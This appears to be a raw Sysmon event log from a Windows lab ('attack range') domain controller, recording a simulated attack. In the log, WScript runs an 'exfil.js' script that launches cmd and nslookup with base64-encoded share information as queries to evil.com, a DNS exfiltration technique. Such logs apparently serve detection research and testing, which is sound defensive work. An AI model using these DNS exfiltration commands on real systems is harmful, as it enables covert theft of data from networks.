C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-3745-000000005F02}4280C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnec.tmp 2>&1 354300x8000000000000000212856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-51012-false127.0.0.1-53domain 354300x8000000000000000212855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-51011-false127.0.0.1-53domain 354300x8000000000000000212854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.798{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-51010-false127.0.0.1-53domain 354300x8000000000000000212853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.797{00000000-0000-0000-0000-000000000000}488<unknown process>-udptruefalse127.0.0.1-51010-false127.0.0.1-53domain 354300x8000000000000000212852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51009-false127.0.0.1-53domain 354300x8000000000000000212851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.728{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51009-false127.0.0.1-53domain 354300x8000000000000000212850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51005-false127.0.0.1-53domain 354300x8000000000000000212849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.628{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51004-false127.0.0.1-53domain 354300x8000000000000000212848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51003-false127.0.0.1-53domain 354300x8000000000000000212847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.552{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51003-false127.0.0.1-53domain 354300x8000000000000000212846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.551{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-51001-false127.0.0.1-53domain 354300x8000000000000000212845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.550{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-51001-false127.0.0.1-53domain 354300x8000000000000000212844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-51000-false127.0.0.1-53domain 354300x8000000000000000212843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.474{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-51000-false127.0.0.1-53domain 23542300x800000000000000044815Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:43.316{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-223MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044814Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:43.222{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB81D7DCAB394C77B8A3A3053336F18B,SHA256=E16D96C48779E9AAC7B2D4E916A3470AEE5B807D80785CB96B41893A39831E34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.976{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7D45-000000005F02}4928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.976{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7D45-000000005F02}4928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.976{2E1864BB-18F8-629A-7D45-000000005F02}49283636C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7C45-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.976{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7D45-000000005F02}4928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7C45-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-18E0-629A-6742-000000005F02}39765948C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-7C45-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.972{2E1864BB-18F8-629A-7C45-000000005F02}7948C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.961{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlflygxo.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.929{2E1864BB-18F8-629A-7A45-000000005F02}51285200C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7B45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7B45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.914{2E1864BB-18F8-629A-7945-000000005F02}19082952C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-7B45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.924{2E1864BB-18F8-629A-7B45-000000005F02}5404C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-7945-000000005F02}1908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlflygxo.tmp 2>&1 22542200x8000000000000000213470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.830{00000000-0000-0000-0000-000000000000}1368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.768{00000000-0000-0000-0000-000000000000}7284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.703{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.616{00000000-0000-0000-0000-000000000000}3864evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.524{00000000-0000-0000-0000-000000000000}5592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.425{00000000-0000-0000-0000-000000000000}5036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.326{00000000-0000-0000-0000-000000000000}5792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.245{00000000-0000-0000-0000-000000000000}3192evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{00000000-0000-0000-0000-000000000000}8152evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.061{00000000-0000-0000-0000-000000000000}6512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.996{00000000-0000-0000-0000-000000000000}1188evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.885{00000000-0000-0000-0000-000000000000}2824evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000213458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.875{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7A45-000000005F02}5128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.875{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7A45-000000005F02}5128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.875{2E1864BB-18F8-629A-7A45-000000005F02}51285200C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7945-000000005F02}1908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.860{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7A45-000000005F02}5128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 